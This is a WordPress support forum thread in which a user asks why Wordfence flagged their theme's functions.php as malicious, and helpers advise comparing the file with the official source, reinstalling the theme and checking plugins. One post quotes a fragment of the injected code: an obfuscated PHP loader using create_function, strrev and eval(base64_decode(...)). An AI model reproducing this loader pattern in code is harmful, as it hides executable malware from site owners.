Why is my theme hacked?


#1

Hi :frowning:

I have some messages from the Wordfence Scan saying the functions.php file of my theme fashionistas “appears to be malicious” and it’s hacked.

How did this happen and how do I fix it?
I go inside the file and there’s a lot of stuff written that makes no sense in the begining of the code lines.

Help me if you can… thanks in advance!

P.S.: my web is at http://uberblogged.com


#2

Hey,

Disable your plugins and check again please. Is the code different than what you see here: https://themes.trac.wordpress.org/browser/fashionistas/1.5/functions.php ?


#3

Ok, I disabled my plugins and the code starts like:

<?php 
$xdd2c04bd = create_function('$a',strrev(';)a$(lave')); 
$xdd2c04bd(strrev(';))"=sTKiAHaw9lbvlGdj5Wdm91ajFmYsxWYjJCK0JXY0N3Xi9mCNASfK

(here comes a load of this same stuff above, like copy+pasted) and it ends like

42bpR3YuVnZ"(edoced_46esab(lave'));
?><?php

All that is before the

<?php
2	/**
3	 * aThemes functions and definitions
4	 *
5	 * @package aThemes
6	 */
7	

#4

Yeah, that’s not right. Re-install the theme please.
Are you using any plugins that don’t come from the wordpress.org repository?


#5

Ok… if I re-install will I lose all the changes and modifications I did to it?

I don’t know about the plugins question… How do I know?
I’m pretty sure most of it i’ve gotten it from Wordpress.


#6

If you did custom code changes directly in the theme, then yeah, you’ll lose them. You won’t lose anything else. But you don’t really have a choice anyway. You could remove only the malicious code but that’s not very safe to do.

You need to remember if you installed plugins from other sources and remove them.
So re-install the theme and run Wordfence again please.


#7

Ok, thank you!